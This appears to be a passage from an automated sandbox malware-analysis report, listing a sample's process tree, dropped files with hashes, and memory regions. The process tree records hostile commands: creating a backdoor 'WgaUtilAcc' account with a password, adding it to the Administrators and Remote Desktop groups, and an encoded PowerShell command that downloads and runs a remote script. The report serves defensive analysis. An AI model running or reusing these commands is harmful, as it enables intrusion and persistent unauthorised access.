      Command: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe
    Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      Command: net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
[1] C:\Windows\System32\cmd.exe
    Command: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      Command: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe
    Command: cmd /C net.exe user WgaUtilAcc jODpYwzb
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      Command: net.exe user WgaUtilAcc jODpYwzb
    [3] C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 user WgaUtilAcc jODpYwzb
[1] C:\Windows\System32\cmd.exe
    Command: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      Command: wmic path win32_VideoController get name
[1] C:\Windows\System32\cmd.exe
    Command: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      Command: wmic CPU get NAME
      - Modifies data under HKEY_USERS
[1] C:\Windows\System32\cmd.exe
    Command: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      Command: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
  MD5: 0f49574acd4f54227055d966b15fffc0
  SHA1: 6c4559636c5735ed5c4d8ad033b8bf65985fc1fb
  SHA256: 562ad9b139d5772493df4dad3a80c63c5b30075520b3f9d71ba45be6c7870a4b
  SHA512: ea70444ee71f48d6bac93226e91c97c3f8223d4a3ad283f7cf54f389983624bb14b7b7f60faf788716b8acc5be96e26951355f65ad3a9b23841f797a6dd2dbc2
- C:\Users\Admin\AppData\Local\Temp\RES84D5.tmp
  MD5: cfe544b5b87e214a2c41395e165a220e
  SHA1: f8a91380023342ae84d2a8aeedf8ff97e566d668
  SHA256: a6563dba05c41f0d02e8cea5d56ed247954ec71ac8bc0fd8d99ce434725fb310
  SHA512: b1108c89dfa8bd2584a0ed3807b11758191a9af5934fd7569178c12b26936038c7903f1b7c32bdbdf55e000b0c9fa0ff99dfd70a4152915dd682fda108d61f77
- C:\Users\Admin\AppData\Local\Temp\RES87C3.tmp
  MD5: 40c3d22fed240f12ce06e914810f0501
  SHA1: f4eced5a6100d67c54717692dc4b30b811fe3952
  SHA256: 70248a186a8f0a7098860ba76e965ac57811bbaea169449bd54226a13faf1064
  SHA512: af15a0c0be2aedebbaa8667448abdb85fe39b97814342383557c175cf3b24a7af6da67f9dc0bc42eda38b058e88fc297ef4582d7d96c5ade8ad6ec61862d5207
- C:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.dll
  MD5: 2fc8166fbe209032e00f78e29a8adcf9
  SHA1: 4b0f73cbf7ce31d709abee2006317c6aa8fe9597
  SHA256: 6311e4c23e7ad6fb28eb1e94d3e6104f761ae35b30b7fbd0ebc44a6940791ee4
  SHA512: 359a1e0f9fe1c71230075f2d52b82e36b69978675c05230c1347df253db5914815b77ca3cc7bb0b2bae134f1f61abdb2899e497dbfe3963f17f309ac3fb80be9
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 37330f50cf392bca59567a22de3b836a
  SHA1: f7b37328533a133567aa28f03015da69e2e36547
  SHA256: a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
  SHA512: 5d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
- C:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.dll
  MD5: 19eba50c43c59f9c2c3903396d881558
  SHA1: 4450609c36d991061b9ecfe4905535c1429bdfd8
  SHA256: 7adbd62789e6e22b6c48ca179db6f3fb5a1dc3d427cc4b7bf88e181804315cac
  SHA512: 0410fd4b64b8b36588c84323811e1b36f6ccbfaafcf612940f7634956ec440e4a32af75479adbad0c36d090df4e22b82c917620f2b7017d605e1337906d745c5
- \??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\CSC6C4D9FC6F68E48DCBD114890A44A2246.TMP
  MD5: 4254059f4973b50684414a2bda46be55
  SHA1: acaf290f7b83b08cc6c8c41788bed67d35e7c276
  SHA256: 71363967ffa06a49433462418a77f870cb295bc01bd555c5ecffd79fd731171d
  SHA512: 8e4b6437fc12a24cb07375c484a18080658eb72b018fad9b1fb2cd4689b386ef49b2038f4b8f692b694ae9a8402ab9485147bf6270e601c9c76d2e941473e6f3
- \??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.0.cs
  MD5: fdff1f264c5f5570a5393659b154cb88
  SHA1: de254de5e517074a9986b36fec83f921aa9aa497
  SHA256: ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769
  SHA512: db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a
- \??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.cmdline
  MD5: 0177062d5d1795c4887e86ebfec0e62e
  SHA1: 446f5951282dba06d39bfca3862c5ee5642c16ec
  SHA256: da15160a760723bdb6178c39972ddca5896858dab4dbc4466592a1a19000ed04
  SHA512: 47da8edf08e25e6943a94a4367738b0d1e8ee839d201009fff7fed2293b010387f07e26791154d2c06d09d141a1f4f43eab478fe2f7af80d9ee7af7cf02fa087
- \??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\CSCC53057A6C714A0B9B24DD4662F9C538.TMP
  MD5: ef7a1e47e2050ac0ecc86132672a6ebf
  SHA1: 68e0fc03f29b151213016bc78fcaccbb10922bea
  SHA256: d1672349e9639f246f611d1c30c2ef1cfe21fac0d66a36a527565d6ac2e97019
  SHA512: f3282f8b94bf9d3ee1dc42d3bf60f3830becf13dc4d226720d40d8a600a61d08fa4eca1fe8e67d40525bf3d4b01a4bc1b9921cc46d62a106b15b1cc767ae1b24
- \??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.0.cs
  MD5: fe552aa471e3747e57ddeff23d6da1fc
  SHA1: 16832293206ec339d47940533443f4fb375826fa
  SHA256: 60122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d
  SHA512: 8cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6
- \??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.cmdline
  MD5: 4c763707ff20c22394c152bbc21463de
  SHA1: 8270ed773cad155be82616cc785356899a97a0c3
  SHA256: 611d31f459d86cf10734d88452163197280d23652168d5cc95fdc5d797698303
  SHA512: 87dd44ec20f2e2e6754e9ef59d4d1b1a788c044febf5ea015aebc282b3d16757a0983caa3b027bb618dd3b63fcea5edc1e7ecf1f20a49f44ddd3b2a040813442
- \Windows\Branding\mediasrv.png
  MD5: b69939766105d4046be4491143b39330
  SHA1: 7ae64736d59fc0a88194e660a517e9d6a767ae71
  SHA256: 136505bce328a92a2cae17917808b38e14566dc8cf2cafc07a082e0b1faeeb83
  SHA512: 1abbce8e75f420b238c24f8465e71d2ab774bee2ab340c125da7a03613f5a88b39c39a5d419a2a95949e8c7eafb58d309a52dd4b33e181f8ab60669e12a667ab
- \Windows\Branding\mediasvc.png
  MD5: 7507da4d158eb385afcb6ac8aa8ddc32
  SHA1: 863311e2958e9635799ba60521b6a508f0457118
  SHA256: 0b27dc9deb3071f8ef7bde42f0acec45047055d261f6ad626b16cb90981cecfc
  SHA512: 321265108ebbfd617d8b67d70237b08a13585f2c8b4dafca4695bebb1d6c3aabda3a582434f004441ce5019d356958337eddd590dd8215bcb4376495e5d28f73
-
memory/364-21-0x0000000000000000-mapping.dmp
memory/572-88-0x0000000000000000-mapping.dmp
memory/796-82-0x0000000000000000-mapping.dmp
memory/796-18-0x0000000000000000-mapping.dmp
memory/984-68-0x0000000000000000-mapping.dmp
memory/1120-83-0x0000000000000000-mapping.dmp
memory/1180-63-0x0000000000000000-mapping.dmp
memory/1236-27-0x0000000000000000-mapping.dmp
memory/1264-85-0x0000000000000000-mapping.dmp
memory/1312-30-0x0000000000000000-mapping.dmp
memory/1352-71-0x0000000000000000-mapping.dmp
memory/1412-84-0x0000000000000000-mapping.dmp
memory/1560-86-0x0000000000000000-mapping.dmp
memory/1572-87-0x0000000000000000-mapping.dmp
memory/1776-90-0x0000000000000000-mapping.dmp
memory/1884-43-0x00000157D3496000-0x00000157D3498000-memory.dmp, Filesize 8KB
memory/1884-38-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmp, Filesize 9.9MB
memory/1884-44-0x00000157D3498000-0x00000157D349A000-memory.dmp, Filesize 8KB
memory/1884-40-0x00000157D3493000-0x00000157D3495000-memory.dmp, Filesize 8KB
memory/1884-39-0x00000157D3490000-0x00000157D3492000-memory.dmp, Filesize 8KB
memory/1884-37-0x0000000000000000-mapping.dmp
memory/2052-73-0x0000000000000000-mapping.dmp
memory/2164-72-0x0000000000000000-mapping.dmp
memory/2260-67-0x0000000000000000-mapping.dmp
memory/2264-81-0x0000000000000000-mapping.dmp
memory/2464-34-0x000001376CDB0000-0x000001376CDB1000-memory.dmp, Filesize 4KB
memory/2464-14-0x000001376CDF0000-0x000001376CDF1000-memory.dmp, Filesize 4KB
memory/2464-13-0x0000013752C50000-0x0000013752C52000-memory.dmp, Filesize 8KB
memory/2464-15-0x0000013752C53000-0x0000013752C55000-memory.dmp, Filesize 8KB
memory/2464-25-0x000001376CD80000-0x000001376CD81000-memory.dmp, Filesize 4KB
memory/2464-35-0x000001376D3C0000-0x000001376D3C1000-memory.dmp, Filesize 4KB
memory/2464-10-0x0000000000000000-mapping.dmp
memory/2464-17-0x0000013752C56000-0x0000013752C58000-memory.dmp, Filesize 8KB
memory/2464-12-0x0000013754650000-0x0000013754651000-memory.dmp, Filesize 4KB
memory/2464-36-0x000001376D750000-0x000001376D751000-memory.dmp, Filesize 4KB
memory/2464-60-0x0000013752C58000-0x0000013752C59000-memory.dmp, Filesize 4KB
memory/2464-11-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmp, Filesize 9.9MB
memory/2504-89-0x0000000000000000-mapping.dmp
memory/2932-66-0x0000000000000000-mapping.dmp
memory/3156-78-0x0000000000000000-mapping.dmp
memory/3424-80-0x0000000000000000-mapping.dmp
memory/3428-79-0x0000000000000000-mapping.dmp
memory/3588-76-0x0000000000000000-mapping.dmp
memory/3916-45-0x0000000000000000-mapping.dmp
memory/3916-46-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmp, Filesize 9.9MB
memory/3916-48-0x00000204DDF60000-0x00000204DDF62000-memory.dmp, Filesize 8KB
memory/3916-49-0x00000204DDF63000-0x00000204DDF65000-memory.dmp, Filesize 8KB
memory/3916-51-0x00000204DDF66000-0x00000204DDF68000-memory.dmp, Filesize 8KB
memory/4040-92-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmp, Filesize 9.9MB
memory/4040-96-0x000001F3BF873000-0x000001F3BF875000-memory.dmp, Filesize 8KB
memory/4040-95-0x000001F3BF870000-0x000001F3BF872000-memory.dmp, Filesize 8KB
memory/4040-91-0x0000000000000000-mapping.dmp
memory/4040-99-0x000001F3BF876000-0x000001F3BF878000-memory.dmp, Filesize 8KB
memory/4040-102-0x000001F3BF878000-0x000001F3BF879000-memory.dmp, Filesize 4KB
memory/4144-77-0x0000000000000000-mapping.dmp
memory/4200-61-0x0000000000000000-mapping.dmp
memory/4256-70-0x0000000000000000-mapping.dmp
memory/4400-64-0x0000000000000000-mapping.dmp
memory/4432-59-0x000002287EBE8000-0x000002287EBEA000-memory.dmp, Filesize 8KB
memory/4432-52-0x0000000000000000-mapping.dmp
memory/4432-58-0x000002287EBE6000-0x000002287EBE8000-memory.dmp, Filesize 8KB
memory/4432-53-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmp, Filesize 9.9MB
memory/4432-55-0x000002287EBE0000-0x000002287EBE2000-memory.dmp, Filesize 8KB
memory/4432-57-0x000002287EBE3000-0x000002287EBE5000-memory.dmp, Filesize 8KB
memory/4508-100-0x0000000000000000-mapping.dmp
memory/4516-97-0x0000000000000000-mapping.dmp
memory/4520-98-0x0000000000000000-mapping.dmp
memory/4568-65-0x0000000000000000-mapping.dmp
memory/4592-101-0x0000000000000000-mapping.dmp
memory/4596-69-0x0000000000000000-mapping.dmp
memory/4620-62-0x0000000000000000-mapping.dmp
memory/4688-2-0x0000000000210000-0x00000000006FA000-memory.dmp, Filesize 4.9MB
memory/4688-3-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmp, Filesize 9.9MB
memory/4688-4-0x000001E439400000-0x000001E4396B3000-memory.dmp, Filesize 2.7MB
memory/4688-6-0x000001E47F310000-0x000001E47F312000-memory.dmp, Filesize 8KB
memory/4688-8-0x000001E47F315000-0x000001E47F316000-memory.dmp, Filesize 4KB
memory/4688-9-0x000001E47F316000-0x000001E47F317000-memory.dmp, Filesize 4KB
memory/4688-7-0x000001E47F313000-0x000001E47F315000-memory.dmp, Filesize 8KB